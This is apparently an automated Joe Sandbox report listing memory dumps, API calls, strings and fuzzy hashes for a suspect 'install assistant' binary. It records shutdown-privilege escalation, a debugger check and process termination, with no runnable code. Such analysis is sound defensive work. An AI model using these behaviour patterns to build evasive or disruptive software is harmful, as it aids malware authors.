                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                                          • Instruction ID: daff465e35a268d62ad76ec9c3736a205e75f430edbca84598b2198dcc10689f
                                                          • Opcode Fuzzy Hash: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                                          • Instruction Fuzzy Hash: FD118871A0420EAFCF05CF58E945A9B3BF8EF48308F054069F808AB301D631EA11CBA4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction ID: 8fabd6d652315a8107c37655f75dd68ec912be72ba93f26020e9240a20051c05
                                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction Fuzzy Hash: F0012872C01159BFCF029FE88D00AEE7FF5AB08214F154165BD24A26A0E7319A24DB91
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                                          • Instruction ID: 2dc6c3185138df8cb28b9d9f7cf74f0394906190dddd2fdd4614e9dda2622d7b
                                                          • Opcode Fuzzy Hash: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                                          • Instruction Fuzzy Hash: DAD06C3210010DBBDF028E84DD06EDA3BAAFB88714F014000BE1856020C732E861AB90
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction ID: dddcfcd49160081868d17e97d85d40bf85997d413c42dd535c0de8a6c7980fcf
                                                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: g)''
                                                          • API String ID: 4218353326-3487984327
                                                          • Opcode ID: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                                          • Instruction ID: 2bcf0cab47e4c38dc211d182357c739ff517fabcb4c6f023be4e1d71f66b22f5
                                                          • Opcode Fuzzy Hash: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                                          • Instruction Fuzzy Hash: 4C630371744B018FC728CF28C4D0B99B7F3BF99318B598A6DC0A64BA55EB74B44ACB41
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 6C0C5D6A
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0C5D76
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0C5D84
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0C5DAB
                                                          • NtInitiatePowerAction.NTDLL ref: 6C0C5DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3256374457-3733053543
                                                          • Opcode ID: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                                          • Instruction ID: 2d7dbaf430851fdc0995a43eb9cd0b488e557a340e54928b56817fff2bbce463
                                                          • Opcode Fuzzy Hash: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                                          • Instruction Fuzzy Hash: 34F0B470648300BBEA106B24DD0EB6A7FF4EF45701F014608F945A61C1D7746A84DB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \j`7$\j`7$j
                                                          • API String ID: 0-3644614255
                                                          • Opcode ID: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                                          • Instruction ID: b9b1fa81de339f5179c902eda1ef04333d4fff0cbedc180aab6b5edc2f86519f
                                                          • Opcode Fuzzy Hash: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                                          • Instruction Fuzzy Hash: 09422476A083828FCB14CF68C48066ABFE1ABCA354F14496EE4D5CB362D339D955CB53
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C126CE5
                                                            • Part of subcall function 6C0FCC2A: __EH_prolog.LIBCMT ref: 6C0FCC2F
                                                            • Part of subcall function 6C0FE6A6: __EH_prolog.LIBCMT ref: 6C0FE6AB
                                                            • Part of subcall function 6C126A0E: __EH_prolog.LIBCMT ref: 6C126A13
                                                            • Part of subcall function 6C126837: __EH_prolog.LIBCMT ref: 6C12683C
                                                            • Part of subcall function 6C12A143: __EH_prolog.LIBCMT ref: 6C12A148
                                                            • Part of subcall function 6C12A143: ctype.LIBCPMT ref: 6C12A16C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ctype
                                                          • String ID:
                                                          • API String ID: 1039218491-3916222277
                                                          • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                                          • Instruction ID: c01e1893ff9d60acb9fcf21ec4de210c0987752bd5d408ff90c073c0a8432713
                                                          • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                                          • Instruction Fuzzy Hash: 1B03BD35805288DFDF11CFA4C890BDDBBB0AF15318F24809AD85567A91DB386BCADF61
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C0D0279
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C0D0283
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C0D0290
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                                          • Instruction ID: 03a90fabd25b6d492cc20120d4c2e2d676172c10174cf3cf0dce6b527f54d733
                                                          • Opcode Fuzzy Hash: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                                          • Instruction Fuzzy Hash: BD31B774E01218ABCB21DF68D9887DDBBF4BF08314F5042DAE51DA7650EB709B858F45
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,6C0CF235,?,?,?,?), ref: 6C0CF19F
                                                          • TerminateProcess.KERNEL32(00000000,?,6C0CF235,?,?,?,?), ref: 6C0CF1A6
                                                          • ExitProcess.KERNEL32 ref: 6C0CF1B8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                                          • Instruction ID: d1c72ed13847ed910d61d993d5b414a70bc9e8ff2536044e79cb66c4657fbe9b
                                                          • Opcode Fuzzy Hash: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                                          • Instruction Fuzzy Hash: 4AE0B632201108AFCF026F95D918A8D3BB9FB46A56F164414FC29C6621CF35E981DA92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: x=J
                                                          • API String ID: 3519838083-1497497802
                                                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                          • Instruction ID: ba0288290c599f86e3bae185afd0ff35913dbe03b3e28629e228c443b0d97bef
                                                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                                          • Instruction Fuzzy Hash: 6F916831D011199ADB04DFA5D890BEDB7F1AF46308F20816ADC7167AA1DB3269CBCB90
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0C78B0
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0C80D3
                                                            • Part of subcall function 6C0C9379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0C80BC,00000000,?,?,?,6C0C80BC,?,6C0F554C), ref: 6C0C93D9
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                                          • String ID:
                                                          • API String ID: 915016180-0
                                                          • Opcode ID: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                                          • Instruction ID: d4c738fa4723d940a197b13b042615ae257066c6dae3576c4e5d5d7867da4c1f
                                                          • Opcode Fuzzy Hash: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                                          • Instruction Fuzzy Hash: 99B17E71A046059BDB09CF95C8817DDBBF4FB45318F64822AE826E7B80D33CAA45CF95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @4J$DsL
                                                          • API String ID: 0-2004129199
                                                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                                          • Instruction ID: 5c37e069a27c3dc725e8371fdd8aecba8c25768d5dd8080c456a6969e7972db0
                                                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                                          • Instruction Fuzzy Hash: 19219137AA49564BE74CCA28DC33EBD2681E744305B89527EED4BCB3D1DF5C8800C648
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C11540F
                                                            • Part of subcall function 6C116137: __EH_prolog.LIBCMT ref: 6C11613C
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                                          • Instruction ID: aea72c987406f21bcd57c0e006968594e3842d0bd45ebf59dd5978a003312c3f
                                                          • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                                          • Instruction Fuzzy Hash: BF629B70D08259CFDF15CFA4C894BEDBBB5BF19308F24416AE815ABA80D7789A44CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: YA1
                                                          • API String ID: 0-613462611
                                                          • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                                          • Instruction ID: e2235ac43fd30ea59b0c5154fb00505ad27e8696abb75934dfccd7ede57cbe1b
                                                          • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                                          • Instruction Fuzzy Hash: 2642F5706093818FC315DF29C49069ABBE2FFD9308F254A6DE9D68BB41C771D916CB82
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aullrem
                                                          • String ID:
                                                          • API String ID: 3758378126-0
                                                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                                          • Instruction ID: 50d5082ef6da613dc81bc1b19770fe4eb4c46f638e6ec5483098e187c860ae07
                                                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                                          • Instruction Fuzzy Hash: 4551C971B092859BD710CF5AC4C06EDFBF6EF7A214F18C05EE8C897242D27A599AC760
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                                          • Instruction ID: 1236aa53983e10c0bd68bb2bdfdd33fc67bcd2c047a63f95b35c817770e2fec4
                                                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                                          • Instruction Fuzzy Hash: 7A029C316083408BD325CF28C4A079EBBE2EFD9348F148A2DE5C597B51D775E949CBA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (SL
                                                          • API String ID: 0-669240678
                                                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                                          • Instruction ID: be20a771e9f4fae7c8cc5fadad3daed552eeb89efd3b5996adcad8ba752af892
                                                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                                          • Instruction Fuzzy Hash: 52519473E208214AD78CCE24DC2177572D2E784310F8BC2B99D8BAB6E6CD78989187C4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                                          • Instruction ID: b7f8ff9ded8efacb7bf96d599f06844c648c1f0589be27818d25aa3be98672b9
                                                          • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                                          • Instruction Fuzzy Hash: 57526031608B858BD328CF29C4907AAB7E2BF95308F148A2DD5DAC7B41DB75F849CB51
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                          • Instruction ID: f051f8f11f78ce0937dee0506cb447d5043a9eebf53bcec879fbd9d72ab4def6
                                                          • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                                          • Instruction Fuzzy Hash: 9C62F0B1A0E3448FC714CF29C48061ABBE6BFD9744F248A2EE89987755D770E845CF92
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
